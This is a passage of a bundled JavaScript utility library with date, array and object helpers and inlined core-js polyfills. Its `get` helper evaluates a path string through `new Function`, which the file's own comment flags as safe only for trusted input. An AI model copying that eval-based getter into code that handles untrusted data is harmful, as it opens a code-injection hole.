};
/**
 * Returns the date one month earlier.
 * @function prevMonth
 * @param {date} [date=new Date()] - Optional date, defaults to now.
 * @return {date}
 * @example
 * U.prevMonth()
 * // => 2018-11-20T17:07:37.937Z (current time is 2018-12)
 *
 * U.prevMonth(new Date(2018, 10, 9))
 * // => 2018-10-08T16:00:00.000Z
 *
 * U.prevMonth(153454878787)
 * // => 1974-10-12T02:21:18.787Z
 *
 * U.prevMonth('2018/12/3')
 * // => 2018-11-02T16:00:00.000Z
 */
var prevMonth = function prevMonth() {
var date = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : new Date();
var d = new Date(date);
d.setMonth(d.getMonth() - 1);
return d;
};
/**
 * Returns the date one month later.
 * @function nextMonth
 * @param {date} [date=new Date()] - Optional date, defaults to now.
 * @return {date}
 * @example
 * U.nextMonth()
 * // => 2019-01-20T17:13:15.179Z (current time is 2018-12)
 *
 * U.nextMonth(new Date(2018, 10, 9))
 * // => 2018-12-08T16:00:00.000Z
 *
 * U.nextMonth(153454878787)
 * // => 1974-12-12T02:21:18.787Z
 *
 * U.nextMonth('2018/12/3')
 * // => 2019-01-02T16:00:00.000Z
 */
var nextMonth = function nextMonth() {
var date = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : new Date();
var d = new Date(date);
d.setMonth(d.getMonth() + 1);
return d;
};
/**
 * Checks whether dateA is later than dateB. Returns a boolean.
 * @function isAfterDate
 * @param {date} dateA - The later date.
 * @param {date} dateB - The earlier date.
 * @return {boolean}
 * @example
 * U.isAfterDate('2018/11/1', '2018/11/30')
 * // => false
 *
 * U.isAfterDate(new Date(2018, 12, 11), new Date(2018, 12, 10))
 * // => true
 */
var isAfterDate = function isAfterDate(dateA, dateB) {
return new Date(dateA) > new Date(dateB);
};
/**
 * Returns the date n days away from date.
 * @function spreadDate
 * @param {number} n - Number of days; negative values give a past date, positive values a future date.
 * @param {date} [date=new Date()] - Optional date, defaults to the current date.
 * @return {date}
 * @example
 * U.spreadDate(1)
 * // => Thu Feb 21 2019 21:01:53 GMT+0800 (current time: Wed Feb 20 2019 21:01:53 GMT+0800)
 *
 * U.spreadDate(-1)
 * // => Tue Feb 19 2019 21:01:53 GMT+0800 (current time: Wed Feb 20 2019 21:01:53 GMT+0800)
 *
 * U.spreadDate(7, new Date(2018, 9, 10))
 * // => Wed Oct 17 2018 00:00:00 GMT+0800 (China Standard Time)
 */
var spreadDate = function spreadDate(n) {
var date = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : new Date();
return new Date(+date + n * 24 * 60 * 60 * 1000);
};
var _iterCall = function (iterator, fn, value, entries) {
try {
return entries ? fn(_anObject(value)[0], value[1]) : fn(value); // 7.4.6 IteratorClose(iterator, completion)
} catch (e) {
var ret = iterator['return'];
if (ret !== undefined) _anObject(ret.call(iterator));
throw e;
}
};
var ITERATOR$1 = _wks('iterator');
var ArrayProto = Array.prototype;
var _isArrayIter = function (it) {
return it !== undefined && (_iterators.Array === it || ArrayProto[ITERATOR$1] === it);
};
var TAG$1 = _wks('toStringTag'); // ES3 wrong here
var ARG = _cof(function () {
return arguments;
}()) == 'Arguments'; // fallback for IE11 Script Access Denied error
var tryGet = function (it, key) {
try {
return it[key];
} catch (e) {
/* empty */
}
};
var _classof = function (it) {
var O, T, B;
return it === undefined ? 'Undefined' : it === null ? 'Null' // @@toStringTag case
: typeof (T = tryGet(O = Object(it), TAG$1)) == 'string' ? T // builtinTag case
: ARG ? _cof(O) // ES3 arguments fallback
: (B = _cof(O)) == 'Object' && typeof O.callee == 'function' ? 'Arguments' : B;
};
var ITERATOR$2 = _wks('iterator');
var core_getIteratorMethod = _core.getIteratorMethod = function (it) {
if (it != undefined) return it[ITERATOR$2] || it['@@iterator'] || _iterators[_classof(it)];
};
var ITERATOR$3 = _wks('iterator');
var SAFE_CLOSING = false;
try {
var riter = [7][ITERATOR$3]();
riter['return'] = function () {
SAFE_CLOSING = true;
}; // eslint-disable-next-line no-throw-literal
} catch (e) {
/* empty */
}
var _iterDetect = function (exec, skipClosing) {
if (!skipClosing && !SAFE_CLOSING) return false;
var safe = false;
try {
var arr = [7];
var iter = arr[ITERATOR$3]();
iter.next = function () {
return {
done: safe = true
};
};
arr[ITERATOR$3] = function () {
return iter;
};
exec(arr);
} catch (e) {
/* empty */
}
return safe;
};
_export(_export.S + _export.F * !_iterDetect(function (iter) {
}), 'Array', {
// 22.1.2.1 Array.from(arrayLike, mapfn = undefined, thisArg = undefined)
from: function from(arrayLike
/* , mapfn = undefined, thisArg = undefined */
) {
var O = _toObject(arrayLike);
var C = typeof this == 'function' ? this : Array;
var aLen = arguments.length;
var mapfn = aLen > 1 ? arguments[1] : undefined;
var mapping = mapfn !== undefined;
var index = 0;
var iterFn = core_getIteratorMethod(O);
var length, result, step, iterator;
if (mapping) mapfn = _ctx(mapfn, aLen > 2 ? arguments[2] : undefined, 2); // if object isn't iterable or it's array with default iterator - use simple case
if (iterFn != undefined && !(C == Array && _isArrayIter(iterFn))) {
for (iterator = iterFn.call(O), result = new C(); !(step = iterator.next()).done; index++) {
_createProperty(result, index, mapping ? _iterCall(iterator, mapfn, [step.value, index], true) : step.value);
}
} else {
length = _toLength(O.length);
for (result = new C(length); length > index; index++) {
_createProperty(result, index, mapping ? mapfn(O[index], index) : O[index]);
}
}
result.length = index;
return result;
}
});
var from_1 = _core.Array.from;
var from_1$1 = from_1;
var _redefineAll = function (target, src, safe) {
for (var key in src) {
if (safe && target[key]) target[key] = src[key];else _hide(target, key, src[key]);
}
return target;
};
var _anInstance = function (it, Constructor, name, forbiddenField) {
if (!(it instanceof Constructor) || forbiddenField !== undefined && forbiddenField in it) {
throw TypeError(name + ': incorrect invocation!');
}
return it;
};
var _forOf = createCommonjsModule(function (module) {
var BREAK = {};
var RETURN = {};
var exports = module.exports = function (iterable, entries, fn, that, ITERATOR) {
var iterFn = ITERATOR ? function () {
return iterable;
} : core_getIteratorMethod(iterable);
var f = _ctx(fn, that, entries ? 2 : 1);
var index = 0;
var length, step, iterator, result;
if (typeof iterFn != 'function') throw TypeError(iterable + ' is not iterable!'); // fast case for arrays with default iterator
if (_isArrayIter(iterFn)) for (length = _toLength(iterable.length); length > index; index++) {
result = entries ? f(_anObject(step = iterable[index])[0], step[1]) : f(iterable[index]);
if (result === BREAK || result === RETURN) return result;
} else for (iterator = iterFn.call(iterable); !(step = iterator.next()).done;) {
result = _iterCall(iterator, f, step.value, entries);
if (result === BREAK || result === RETURN) return result;
}
};
exports.BREAK = BREAK;
exports.RETURN = RETURN;
});
var SPECIES = _wks('species');
var _setSpecies = function (KEY) {
var C = typeof _core[KEY] == 'function' ? _core[KEY] : _global[KEY];
if (_descriptors && C && !C[SPECIES]) _objectDp.f(C, SPECIES, {
configurable: true,
get: function () {
return this;
}
});
};
var _validateCollection = function (it, TYPE) {
if (!_isObject(it) || it._t !== TYPE) throw TypeError('Incompatible receiver, ' + TYPE + ' required!');
return it;
};
var dP$2 = _objectDp.f;
var fastKey = _meta.fastKey;
var SIZE = _descriptors ? '_s' : 'size';
var getEntry = function (that, key) {
// fast case
var index = fastKey(key);
var entry;
if (index !== 'F') return that._i[index]; // frozen object case
for (entry = that._f; entry; entry = entry.n) {
if (entry.k == key) return entry;
}
};
var _collectionStrong = {
getConstructor: function (wrapper, NAME, IS_MAP, ADDER) {
var C = wrapper(function (that, iterable) {
_anInstance(that, C, NAME, '_i');
that._t = NAME; // collection type
that._i = _objectCreate(null); // index
that._f = undefined; // first entry
that._l = undefined; // last entry
that[SIZE] = 0; // size
if (iterable != undefined) _forOf(iterable, IS_MAP, that[ADDER], that);
});
_redefineAll(C.prototype, {
// 23.1.3.1 Map.prototype.clear()
// 23.2.3.2 Set.prototype.clear()
clear: function clear() {
for (var that = _validateCollection(this, NAME), data = that._i, entry = that._f; entry; entry = entry.n) {
entry.r = true;
if (entry.p) entry.p = entry.p.n = undefined;
delete data[entry.i];
}
that._f = that._l = undefined;
that[SIZE] = 0;
},
// 23.1.3.3 Map.prototype.delete(key)
// 23.2.3.4 Set.prototype.delete(value)
'delete': function (key) {
var that = _validateCollection(this, NAME);
var entry = getEntry(that, key);
if (entry) {
var next = entry.n;
var prev = entry.p;
delete that._i[entry.i];
entry.r = true;
if (prev) prev.n = next;
if (next) next.p = prev;
if (that._f == entry) that._f = next;
if (that._l == entry) that._l = prev;
that[SIZE]--;
}
return !!entry;
},
// 23.2.3.6 Set.prototype.forEach(callbackfn, thisArg = undefined)
// 23.1.3.5 Map.prototype.forEach(callbackfn, thisArg = undefined)
forEach: function forEach(callbackfn
/* , that = undefined */
) {
_validateCollection(this, NAME);
var f = _ctx(callbackfn, arguments.length > 1 ? arguments[1] : undefined, 3);
var entry;
while (entry = entry ? entry.n : this._f) {
f(entry.v, entry.k, this); // revert to the last existing entry
while (entry && entry.r) entry = entry.p;
}
},
// 23.1.3.7 Map.prototype.has(key)
// 23.2.3.7 Set.prototype.has(value)
has: function has(key) {
return !!getEntry(_validateCollection(this, NAME), key);
}
});
if (_descriptors) dP$2(C.prototype, 'size', {
get: function () {
return _validateCollection(this, NAME)[SIZE];
}
});
return C;
},
def: function (that, key, value) {
var entry = getEntry(that, key);
var prev, index; // change existing entry
if (entry) {
entry.v = value; // create new entry
} else {
that._l = entry = {
i: index = fastKey(key, true),
// <- index
k: key,
// <- key
v: value,
// <- value
p: prev = that._l,
// <- previous entry
n: undefined,
// <- next entry
r: false // <- removed
};
if (!that._f) that._f = entry;
if (prev) prev.n = entry;
that[SIZE]++; // add to index
if (index !== 'F') that._i[index] = entry;
}
return that;
},
getEntry: getEntry,
setStrong: function (C, NAME, IS_MAP) {
// add .keys, .values, .entries, [@@iterator]
_iterDefine(C, NAME, function (iterated, kind) {
this._t = _validateCollection(iterated, NAME); // target
this._k = kind; // kind
this._l = undefined; // previous
}, function () {
var that = this;
var kind = that._k;
var entry = that._l; // revert to the last existing entry
while (entry && entry.r) entry = entry.p; // get next entry
if (!that._t || !(that._l = entry = entry ? entry.n : that._t._f)) {
// or finish the iteration
that._t = undefined;
return _iterStep(1);
} // return step by kind
if (kind == 'keys') return _iterStep(0, entry.k);
if (kind == 'values') return _iterStep(0, entry.v);
return _iterStep(0, [entry.k, entry.v]);
}, IS_MAP ? 'entries' : 'values', !IS_MAP, true); // add [@@species]
_setSpecies(NAME);
}
};
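// _collectionStrong implements Map/Set as a doubly linked list of entries
// ({ k: key, v: value, p: prev, n: next, r: removed }) indexed by _meta's
// fastKey, which keeps iteration order stable even when entries are deleted
// mid-iteration.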
var SPECIES$1 = _wks('species');
var _arraySpeciesConstructor = function (original) {
var C;
if (_isArray(original)) {
C = original.constructor; // cross-realm fallback
if (typeof C == 'function' && (C === Array || _isArray(C.prototype))) C = undefined;
if (_isObject(C)) {
C = C[SPECIES$1];
if (C === null) C = undefined;
}
}
return C === undefined ? Array : C;
};
var _arraySpeciesCreate = function (original, length) {
return new (_arraySpeciesConstructor(original))(length);
};
// 1 -> Array#map
// 2 -> Array#filter
// 3 -> Array#some
// 4 -> Array#every
// 5 -> Array#find
// 6 -> Array#findIndex
var _arrayMethods = function (TYPE, $create) {
var IS_MAP = TYPE == 1;
var IS_FILTER = TYPE == 2;
var IS_SOME = TYPE == 3;
var IS_EVERY = TYPE == 4;
var IS_FIND_INDEX = TYPE == 6;
var NO_HOLES = TYPE == 5 || IS_FIND_INDEX;
var create = $create || _arraySpeciesCreate;
return function ($this, callbackfn, that) {
var O = _toObject($this);
var self = _iobject(O);
var f = _ctx(callbackfn, that, 3);
var length = _toLength(self.length);
var index = 0;
var result = IS_MAP ? create($this, length) : IS_FILTER ? create($this, 0) : undefined;
var val, res;
for (; length > index; index++) if (NO_HOLES || index in self) {
val = self[index];
res = f(val, index, O);
if (TYPE) {
if (IS_MAP) result[index] = res; // map
else if (res) switch (TYPE) {
case 3:
return true;
// some
case 5:
return val;
// find
case 6:
return index;
// findIndex
case 2:
result.push(val);
// filter
} else if (IS_EVERY) return false; // every
}
}
return IS_FIND_INDEX ? -1 : IS_SOME || IS_EVERY ? IS_EVERY : result;
};
};
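// The final expression returns -1 for a missed findIndex, undefined for a
// missed find, false/true for some/every, and the collected array for
// map/filter.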
var dP$3 = _objectDp.f;
var each = _arrayMethods(0);
var _collection = function (NAME, wrapper, methods, common, IS_MAP, IS_WEAK) {
var Base = _global[NAME];
var C = Base;
var ADDER = IS_MAP ? 'set' : 'add';
var proto = C && C.prototype;
var O = {};
if (!_descriptors || typeof C != 'function' || !(IS_WEAK || proto.forEach && !_fails(function () {
new C().entries().next();
}))) {
// create collection constructor
C = common.getConstructor(wrapper, NAME, IS_MAP, ADDER);
_redefineAll(C.prototype, methods);
_meta.NEED = true;
} else {
C = wrapper(function (target, iterable) {
_anInstance(target, C, NAME, '_c');
target._c = new Base();
if (iterable != undefined) _forOf(iterable, IS_MAP, target[ADDER], target);
});
each('add,clear,delete,forEach,get,has,set,keys,values,entries,toJSON'.split(','), function (KEY) {
var IS_ADDER = KEY == 'add' || KEY == 'set';
if (KEY in proto && !(IS_WEAK && KEY == 'clear')) _hide(C.prototype, KEY, function (a, b) {
_anInstance(this, C, KEY);
if (!IS_ADDER && IS_WEAK && !_isObject(a)) return KEY == 'get' ? undefined : false;
var result = this._c[KEY](a === 0 ? 0 : a, b);
return IS_ADDER ? this : result;
});
});
IS_WEAK || dP$3(C.prototype, 'size', {
get: function () {
return this._c.size;
}
});
}
_setToStringTag(C, NAME);
O[NAME] = C;
_export(_export.G + _export.W + _export.F, O);
if (!IS_WEAK) common.setStrong(C, NAME, IS_MAP);
return C;
};
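// _collection either builds a full polyfill constructor (getConstructor) or,
// when a usable native collection exists, wraps it so that -0 keys are
// normalized to +0 and add/set return the collection for chaining.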
var SET = 'Set'; // 23.2 Set Objects
var es6_set = _collection(SET, function (get) {
return function Set() {
return get(this, arguments.length > 0 ? arguments[0] : undefined);
};
}, {
// 23.2.3.1 Set.prototype.add(value)
add: function add(value) {
return _collectionStrong.def(_validateCollection(this, SET), value = value === 0 ? 0 : value, value);
}
}, _collectionStrong);
var _arrayFromIterable = function (iter, ITERATOR) {
var result = [];
_forOf(iter, false, result.push, result, ITERATOR);
return result;
};
var _collectionToJson = function (NAME) {
return function toJSON() {
if (_classof(this) != NAME) throw TypeError(NAME + "#toJSON isn't generic");
return _arrayFromIterable(this);
};
};
_export(_export.P + _export.R, 'Set', {
toJSON: _collectionToJson('Set')
});
var _setCollectionOf = function (COLLECTION) {
_export(_export.S, COLLECTION, {
of: function of() {
var length = arguments.length;
var A = new Array(length);
while (length--) A[length] = arguments[length];
return new this(A);
}
});
};
_setCollectionOf('Set');
var _setCollectionFrom = function (COLLECTION) {
_export(_export.S, COLLECTION, {
from: function from(source
/* , mapFn, thisArg */
) {
var mapFn = arguments[1];
var mapping, A, n, cb;
_aFunction(this);
mapping = mapFn !== undefined;
if (mapping) _aFunction(mapFn);
if (source == undefined) return new this();
A = [];
if (mapping) {
n = 0;
cb = _ctx(mapFn, arguments[2], 2);
_forOf(source, false, function (nextItem) {
A.push(cb(nextItem, n++));
});
} else {
_forOf(source, false, A.push, A);
}
return new this(A);
}
});
};
_setCollectionFrom('Set');
var set = _core.Set;
var set$1 = set;
function _arrayWithoutHoles(arr) {
if (isArray$1(arr)) {
for (var i = 0, arr2 = new Array(arr.length); i < arr.length; i++) {
arr2[i] = arr[i];
}
return arr2;
}
}
var arrayWithoutHoles = _arrayWithoutHoles;
var ITERATOR$4 = _wks('iterator');
var core_isIterable = _core.isIterable = function (it) {
var O = Object(it);
return O[ITERATOR$4] !== undefined || '@@iterator' in O // eslint-disable-next-line no-prototype-builtins
|| _iterators.hasOwnProperty(_classof(O));
};
var isIterable = core_isIterable;
var isIterable$1 = isIterable;
function _iterableToArray(iter) {
if (isIterable$1(Object(iter)) || Object.prototype.toString.call(iter) === "[object Arguments]") return from_1$1(iter);
}
var iterableToArray = _iterableToArray;
function _nonIterableSpread() {
throw new TypeError("Invalid attempt to spread non-iterable instance");
}
var nonIterableSpread = _nonIterableSpread;
function _toConsumableArray(arr) {
return arrayWithoutHoles(arr) || iterableToArray(arr) || nonIterableSpread();
}
var toConsumableArray = _toConsumableArray;
/**
 * Returns the last element of an array.
 * @function lastItem
 * @param {array} arr - Source array.
 * @return {*}
 * @example
 * let value = U.lastItem([1, 1, 2, 3])
 * // => 3
 *
 * let value = U.lastItem([])
 * // => undefined
 */
var lastItem = function lastItem(arr) {
return arr[arr.length - 1];
};
/**
 * Removes duplicate values from an array, returning a new array.
 * @function uniqueItems
 * @param {array} arr - Source array to deduplicate.
 * @return {array}
 * @example
 * let arr = [1, 1, 2, 3, 3, 4, 5]
 * arr = U.uniqueItems(arr)
 * // => [1, 2, 3, 4, 5]
 */
var uniqueItems = function uniqueItems(arr) {
return toConsumableArray(new set$1(arr));
};
/**
 * Returns all unique values of an array according to the provided comparator.
 * @function uniqueItemsBy
 * @param {array} arr - Source array.
 * @param {function} fn - Comparator function.
 * @param {*} fn.a - First element being compared.
 * @param {*} fn.b - Second element being compared.
 * @param {boolean} [isRight=false] - Optional, false by default; when true, comparison starts from the last element.
 * @return {array}
 * @example
 * U.uniqueItemsBy([
 *   { id: 0, value: 'a' },
 *   { id: 1, value: 'b' },
 *   { id: 2, value: 'c' },
 *   { id: 0, value: 'd' }
 * ],
 * (a, b) => a.id == b.id)
 * // => [{ id: 0, value: 'a' }, { id: 1, value: 'b' }, { id: 2, value: 'c' }]
 *
 * U.uniqueItemsBy([
 *   { id: 0, value: 'a' },
 *   { id: 1, value: 'b' },
 *   { id: 2, value: 'c' },
 *   { id: 0, value: 'd' }
 * ],
 * (a, b) => a.id == b.id,
 * true)
 * // => [{ id: 0, value: 'd' }, { id: 2, value: 'c' }, { id: 1, value: 'b' }]
 */
var uniqueItemsBy = function uniqueItemsBy(arr, fn, isRight) {
return arr[isRight ? 'reduceRight' : 'reduce'](function (acc, x) {
if (!acc.some(function (y) {
return fn(x, y);
})) acc.push(x);
return acc;
}, []);
};
/**
 * Collects the values that appear more than once in an array, returning a new array.
 * @function repeatItems
 * @param {array} arr - Source array.
 * @return {array}
 * @example
 * U.repeatItems([1, 1, 2, 3, 3, 4, 5])
 * // => [1, 3]
 */
var repeatItems = function repeatItems(arr) {
return arr.filter(function (item, i) {
return arr.indexOf(item) === i && arr.indexOf(item) !== arr.lastIndexOf(item);
});
};
/**
 * Creates an array of the given length filled with a value. When the filler is
 * a function, it receives the current index i and the array length len.
 * @function initArray
 * @param {number} len - Array length.
 * @param {*|function} [val|fn=null] - Optional value (or mapping function) for each element, null by default; when a function, its parameters are listed below:
 * @param {number} fn.index - Optional, index of the element being produced.
 * @param {number} fn.length - Optional, length of the array.
 * @return {array}
 * @example
 * console.log(U.initArray(3))
 * // => [null, null, null]
 *
 * const arr = U.initArray(3, {a: 1, b: 2})
 * // => [ { a: 1, b: 2 }, { a: 1, b: 2 }, { a: 1, b: 2 } ]
 *
 * const arr = U.initArray(3, (i) => i * 2)
 * // => [ 0, 2, 4 ]
 */
var initArray = function initArray(len) {
var val = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : null;
return isFunction(val) ? from_1$1({
length: len
}, function (item, i) {
return val(i, len);
}) : from_1$1({
length: len
}).fill(val);
};
/**
 * Maps the values of an array to an object: the original array values become
 * the keys and the mapped values become the values.
 * @function mapObject
 * @param {array} arr - Array whose values become the object keys.
 * @param {function(currentValue, index, array)} fn - Mapping function that produces the object values.
 * @param {*} fn.currentValue - The element currently being processed.
 * @param {number} fn.index - Optional, index of the element currently being processed.
 * @param {array} fn.array - Optional, the array being processed.
 * @return {object}
 * @example
 * const obj = U.mapObject([1, 2, 3], i => i * 2)
 * // => {1: 2, 2: 4, 3: 6}
 */
var mapObject = function mapObject(arr, fn) {
arr = [arr, arr.map(fn)];
return arr[0].reduce(function (acc, val, i) {
acc[val] = arr[1][i];
return acc;
}, {});
};
/**
 * Returns the average of a given key (or key mapping) over the array elements.
 * @function averageBy
 * @param {array} arr - Array to evaluate.
 * @param {function|string} fn - Mapping function or key name.
 * @return {number}
 * @example
 * const arr = [{a: 1, b: 2}, {a: 2, b: 4}]
 *
 * U.averageBy(arr, 'a')
 * // => 1.5
 *
 * U.averageBy(arr, o => o.a * o.b)
 * // => 5
 */
var averageBy = function averageBy(arr, fn) {
return arr.map(isFunction(fn) ? fn : function (val) {
return val[fn];
}).reduce(function (acc, v) {
return acc + v;
}, 0) / arr.length;
};
/**
 * Returns the maximum of a given key (or key mapping) over the array elements.
 * @function maxBy
 * @param {array} arr - Array to evaluate.
 * @param {function|string} fn - Mapping function or key name.
 * @return {number}
 * @example
 * const arr = [{a: 1, b: 2}, {a: 2, b: 4}]
 *
 * U.maxBy(arr, 'a')
 * // => 2
 *
 * U.maxBy(arr, o => o.a * o.b)
 * // => 8
 */
var maxBy = function maxBy(arr, fn) {
return Math.max.apply(Math, toConsumableArray(arr.map(isFunction(fn) ? fn : function (v) {
return v[fn];
})));
};
/**
 * Returns the minimum of a given key (or key mapping) over the array elements.
 * @function minBy
 * @param {array} arr - Array to evaluate.
 * @param {function|string} fn - Mapping function or key name.
 * @return {number}
 * @example
 * const arr = [{a: 1, b: 2}, {a: 2, b: 4}]
 *
 * U.minBy(arr, 'a')
 * // => 1
 *
 * U.minBy(arr, o => o.a * o.b)
 * // => 2
 */
var minBy = function minBy(arr, fn) {
return Math.min.apply(Math, toConsumableArray(arr.map(isFunction(fn) ? fn : function (v) {
return v[fn];
})));
};
/**
 * Splits an array into chunks of the given size.
 * @function chunk
 * @param {array} arr - Array to split.
 * @param {number} size - Length of each chunk.
 * @return {array}
 * @example
 * chunk([1, 2, 3, 4, 5], 2)
 * // => [[1,2],[3,4],[5]]
 */
var chunk = function chunk(arr, size) {
return from_1$1({
length: Math.ceil(arr.length / size)
}, function (v, i) {
return arr.slice(i * size, i * size + size);
});
};
var meta = _meta.onFreeze;
_objectSap('freeze', function ($freeze) {
return function freeze(it) {
return $freeze && _isObject(it) ? $freeze(meta(it)) : it;
};
});
var freeze = _core.Object.freeze;
var freeze$1 = freeze;
var $assign = Object.assign; // should work with symbols and should have deterministic property order (V8 bug)
var _objectAssign = !$assign || _fails(function () {
var A = {};
var B = {}; // eslint-disable-next-line no-undef
var S = Symbol();
var K = 'abcdefghijklmnopqrst';
A[S] = 7;
K.split('').forEach(function (k) {
B[k] = k;
});
return $assign({}, A)[S] != 7 || Object.keys($assign({}, B)).join('') != K;
}) ? function assign(target, source) {
// eslint-disable-line no-unused-vars
var T = _toObject(target);
var aLen = arguments.length;
var index = 1;
var getSymbols = _objectGops.f;
var isEnum = _objectPie.f;
while (aLen > index) {
var S = _iobject(arguments[index++]);
var keys = getSymbols ? _objectKeys(S).concat(getSymbols(S)) : _objectKeys(S);
var length = keys.length;
var j = 0;
var key;
while (length > j) {
key = keys[j++];
if (!_descriptors || isEnum.call(S, key)) T[key] = S[key];
}
}
return T;
} : $assign;
_export(_export.S + _export.F, 'Object', {
assign: _objectAssign
});
var assign = _core.Object.assign;
var assign$1 = assign;
function ownKeys(object, enumerableOnly) { var keys = keys$1(object); if (getOwnPropertySymbols$1) { keys.push.apply(keys, getOwnPropertySymbols$1(object)); } if (enumerableOnly) keys = keys.filter(function (sym) { return getOwnPropertyDescriptor$1(object, sym).enumerable; }); return keys; }
function _objectSpread(target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i] != null ? arguments[i] : {}; if (i % 2) { ownKeys(source, true).forEach(function (key) { defineProperty$3(target, key, source[key]); }); } else if (getOwnPropertyDescriptors$1) { defineProperties$1(target, getOwnPropertyDescriptors$1(source)); } else { ownKeys(source).forEach(function (key) { defineProperty$1(target, key, getOwnPropertyDescriptor$1(source, key)); }); } } return target; }
/**
 * Deep-clones an object.
 * @function deepClone
 * @param {object} obj - Source object to clone.
 * @return {object}
 * @example
 * var a = { foo: 'bar', obj: { a: 1, b: 2 } }
 * var b = U.deepClone(a)
 * b.foo = 'foo'
 * // => a = { foo: 'bar', obj: { a: 1, b: 2 } }, b = { foo: 'foo', obj: { a: 1, b: 2 } }
 */
var deepClone = function deepClone(obj) {
var clone = assign$1({}, obj);
keys$1(clone).forEach(function (k) {
clone[k] = isObject(obj[k]) ? deepClone(obj[k]) : obj[k];
});
return isArray$1(obj) ? (clone.length = obj.length) && from_1$1(clone) : clone;
};
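// deepClone caveat (not in the original docs): only plain objects and arrays
// are recursed into — Date/Map/Set instances degrade to plain copies of their
// own enumerable properties, and circular references recurse without bound.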
/**
 * Deep-freezes an object.
 * @function deepFreeze
 * @param {object} obj - Source object to freeze.
 * @return {object}
 * @example
 * let arr = [1, [2, 3]]
 * const o = U.deepFreeze(arr)
 * o[0] = 3
 * o[1][0] = 4
 * // => arr = [1, [2, 3]], o = [1, [2, 3]]
 */
var deepFreeze = function deepFreeze(obj) {
keys$1(obj).forEach(function (prop) {
if (obj[prop] instanceof Object && obj[prop] !== null) {
deepFreeze(obj[prop]);
}
});
return freeze$1(obj);
};
/**
 * Renames keys of an object.
 * @function renameKeys
 * @param {object} map - Object of oldKey: newKey pairs.
 * @param {object} obj - Target object.
 * @return {object}
 * @example
 * let obj = {name: 'john', job: 'fonts', detail: [1, 2]}
 * U.renameKeys({job: 'possion'}, obj)
 * // => { name: 'john', possion: 'fonts', detail: [ 1, 2 ] }
 */
var renameKeys = function renameKeys(map, obj) {
return keys$1(obj).reduce(function (acc, key) {
return _objectSpread({}, acc, {}, defineProperty$3({}, map[key] || key, obj[key]));
}, {});
};
/**
 * Omits the key-value pairs of an object corresponding to the given keys.
 * @function omit
 * @param {object} obj - Target object.
 * @param {array} arr - Array of key names to omit.
 * @return {object}
 * @example
 * U.omit({ a: 1, b: '2', c: 3 }, ['b'])
 * // => { a: 1, c: 3 }
 */
var omit = function omit(obj, arr) {
return keys$1(obj).filter(function (k) {
return !arr.includes(k);
}).reduce(function (acc, key) {
return acc[key] = obj[key], acc;
}, {});
};
/**
 * Checks whether val is empty (no own enumerable keys and no length).
 * @function isEmpty
 * @param {*} val - Value to check.
 * @return {boolean}
 * @example
 * U.isEmpty(new Map()) // => true
 * U.isEmpty(new Set()) // => true
 * U.isEmpty({}) // => true
 * U.isEmpty([]) // => true
 * U.isEmpty('') // => true
 * U.isEmpty({a: 1}) // => false
 * U.isEmpty([2]) // => false
 * U.isEmpty('text') // => false
 * U.isEmpty(123) // => true
 * U.isEmpty(true) // => true
 * U.isEmpty(false) // => true
 */
var isEmpty = function isEmpty(val) {
return !(keys$1(val) || val).length;
};
/**
* 根据obj对象的path路径获取值。
* @function get
* @param {object} obj - 要检索的对象
* @param {string} path - 要获取属性的路径
* @return {*}
* @example
* const obj = {name: 'joe', child: [{name: 'john', child: null}]}
* U.get(obj, 'child[0].name')
* // => 'john'
*/
var get = function get(obj, path) {
return new Function('obj', 'return obj.' + path)(obj);
};
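// Note: `get` builds a Function from the path string, which is effectively an
// eval of "obj." + path. The path must therefore come from trusted code, and a
// missing intermediate property makes the generated function throw at call time.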
// fast apply, http://jsperf.lnkit.com/fast-apply/5
var _invoke = function (fn, args, that) {
var un = that === undefined;
switch (args.length) {
case 0:
return un ? fn() : fn.call(that);
case 1:
return un ? fn(args[0]) : fn.call(that, args[0]);
case 2:
return un ? fn(args[0], args[1]) : fn.call(that, args[0], args[1]);
case 3:
return un ? fn(args[0], args[1], args[2]) : fn.call(that, args[0], args[1], args[2]);
case 4:
return un ? fn(args[0], args[1], args[2], args[3]) : fn.call(that, args[0], args[1], args[2], args[3]);
}
return fn.apply(that, args);
};
var arraySlice = [].slice;
var factories = {};
var construct = function (F, len, args) {
if (!(len in factories)) {
for (var n = [], i = 0; i < len; i++) n[i] = 'a[' + i + ']'; // eslint-disable-next-line no-new-func
factories[len] = Function('F,a', 'return new F(' + n.join(',') + ')');
}
return factories[len](F, args);
};
var _bind = Function.bind || function bind(that
/* , ...args */
) {
var fn = _aFunction(this);
var partArgs = arraySlice.call(arguments, 1);
var bound = function ()
/* args... */
{
var args = partArgs.concat(arraySlice.call(arguments));
return this instanceof bound ? construct(fn, args.length, args) : _invoke(fn, args, that);
};
if (_isObject(fn.prototype)) bound.prototype = fn.prototype;
return bound;
};
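// core-js fallback for Function.prototype.bind: partially applied arguments are
// captured in a closure, and `construct` rebuilds `new F(...)` so that calling
// the bound function with `new` still constructs instances of the original target.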
var rConstruct = (_global.Reflect || {}).construct; // MS Edge supports only 2 arguments and argumentsList argument is optional
// FF Nightly sets third argument as `new.target`, but does not create `this` from it
var NEW_TARGET_BUG = _fails(function () {
function F() {
/* empty */
}
return !(rConstruct(function () {
/* empty */
}, [], F) instanceof F);
});
var ARGS_BUG = !_fails(function () {
rConstruct(function () {
/* empty */
});
});
_export(_export.S + _export.F * (NEW_TARGET_BUG || ARGS_BUG), 'Reflect', {
construct: function construct(Target, args
/* , newTarget */
) {
_aFunction(Target);
_anObject(args);
var newTarget = arguments.length < 3 ? Target : _aFunction(arguments[2]);
if (ARGS_BUG && !NEW_TARGET_BUG) return rConstruct(Target, args, newTarget);
if (Target == newTarget) {
// w/o altered newTarget, optimization for 0-4 arguments
switch (args.length) {
case 0:
return new Target();
case 1:
return new Target(args[0]);
case 2:
return new Target(args[0], args[1]);
case 3:
return new Target(args[0], args[1], args[2]);
case 4:
return new Target(args[0], args[1], args[2], args[3]);
} // w/o altered newTarget, lot of arguments case
var $args = [null];
$args.push.apply($args, args);
return new (_bind.apply(Target, $args))();
} // with altered newTarget, not support built-in constructors
var proto = newTarget.prototype;
var instance = _objectCreate(_isObject(proto) ? proto : Object.prototype);
var result = Function.apply.call(Target, instance, args);
return _isObject(result) ? result : instance;
}
});
var construct$1 = _core.Reflect.construct;
var construct$2 = construct$1;
/* eslint-disable no-proto */
